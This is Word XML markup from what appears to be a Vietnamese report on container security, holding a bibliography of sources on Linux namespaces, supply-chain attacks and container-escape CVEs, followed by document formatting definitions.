              <w:tr w:rsidR="00D345B6" w14:paraId="6615634A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="53AED0B7" w14:textId="40336932" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7489D09F" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>K. Inc, "medium.com," 13 Mar 2019. [Online]. Available: https://medium.com/@knoldus/unionfs-a-file-system-of-a-container-2136cd11a779.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="42242962" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5D8EEDB7" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4F426B88" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Nimmagadda, “Linux Namespaces and cgroups as OS Primitives for Lightweight,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">researchgate, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="05873FCB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="00545A70" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3F1E3941" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>R. Rosen, “Namespaces and Cgroups – the basis of Linux Containers,” [Trực tuyến]. Available: https://www.andrew.cmu.edu/course/14-712-s20/applications/ln/Namespaces_Cgroups_Conatiners.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="2096D29C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="30A7140E" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="14B9379A" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">H. S. S. J. Motahare Mounesan, “Exploring the Threat of Software Supply Chain Attacks on Containerized Applications,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">researchgate, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2023. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="586B1382" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="551A5EF9" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6FBA480D" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>C. a. I. S. A. (CISA), “APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations (SolarWinds),” CISA, 2020.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="4421E628" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1ED83493" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6765B6C7" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>C. O. Report, “Bash Uploader Security Incident,” Codecov Security Update, 2021.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="1443EA1A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="63875BA7" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5AD40EAD" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2019-5736: runc Container Escape Vulnerability,” NIST, 2019.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="33561F55" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0C78A677" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0B96CD7E" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2020-15257: containerd-shim API Exposure Vulnerability,” NIST, 2020.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="40B4F115" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="09FCE170" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="45614C32" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>M. Kellermann, “The Dirty Pipe Vulnerability (CVE-2022-0847),” CM4all Report, 2022.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="20898FDD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="78918113" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0111BCED" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2018-1002105: Kubernetes API Server Privilege Escalation,” NIST, 2018.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="5C6D42E9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5860DADD" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="16B943DD" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">P. A. N. Research, “Unit 42,” trong </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Hildegard: New Malware Campaign Targetting Kubernetes via Kubelet API</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00D345B6" w14:paraId="27E9B62D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1044523113"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="66ACC560" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0D1CE0D3" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6" w:rsidP="00D345B6">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2021-25741: Kubernetes Ingress Controller Information Disclosure Vulnerability,” NIST, 2021.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w14:paraId="4BFEA6AD" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00D345B6">
              <w:pPr>
                <w:divId w:val="1044523113"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="6B38F9D9" w14:textId="48C9AA3B" w:rsidR="00044C71" w:rsidRPr="00026BE1" w:rsidRDefault="00044C71" w:rsidP="00026BE1">
              <w:pPr>
                <w:ind w:firstLine="0"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:sectPr w:rsidR="00044C71" w:rsidRPr="00026BE1" w:rsidSect="00FA4830">
      <w:headerReference w:type="default" r:id="rId33"/>
      <w:footerReference w:type="default" r:id="rId34"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
      <w:pgMar w:top="1985"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258EB" w14:textId="77777777" w:rsidR="00EF7A00" w:rsidRDefault="00EF7A00" w:rsidP="001B37E5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="70E74835" w14:textId="77777777" w:rsidR="00EF7A00" w:rsidRDefault="00EF7A00" w:rsidP="001B3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Time">
    <w:altName w:val="Times New Roman"/>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720F9" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA4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4DED7" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA48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FC568" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA483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A66DC" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA483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07E99" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA4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B0CA0" w14:textId="77777777" w:rsidR="00EF7A00" w:rsidRDefault="00EF7A00" w:rsidP="001B37E5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7EC1438F" w14:textId="77777777" w:rsidR="00EF7A00" w:rsidRDefault="00EF7A00" w:rsidP="001B37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531C3" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA48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835811"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="1CC5B7C4" w14:textId="76DE55E0" w:rsidR="00FA4830" w:rsidRDefault="00FA4830">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="151AF965" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA48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520920"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7BD539BC" w14:textId="3A89D2BD" w:rsidR="00A13819" w:rsidRDefault="00A1381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3369AF" w14:textId="77777777" w:rsidR="00A13819" w:rsidRDefault="00A138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6163762"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="4916229B" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA4830">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ii</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="713A6B4C" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA48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661324"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="1DF9B1E9" w14:textId="35634482" w:rsidR="00FA4830" w:rsidRDefault="00FA483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31A39ED" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA4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B26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B366E6BC"/>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C76655"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45146FCA"/>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8C3DB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCEC1E42"/>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216BA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20827E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42129D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94644518"/>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AC490C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36C4505E"/>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CF6501"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2D8E386"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>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31E6749"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C6A09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46D1AED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5668908"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHƯƠNG %1:"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="26"/>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294C74F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E714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613DF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D2844AE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>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6A60E5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10CCE58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47C350EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4742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254B73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="904E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70740A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E736B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25559F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F58C9A5C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="585" w:hanging="585"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="72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16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="64142EC9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0630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1D7E55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAF2609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2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i/>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E52481"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="393C150C"/>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0C274D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1183AC0"/>
    <w:styleLink w:val="Style1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>
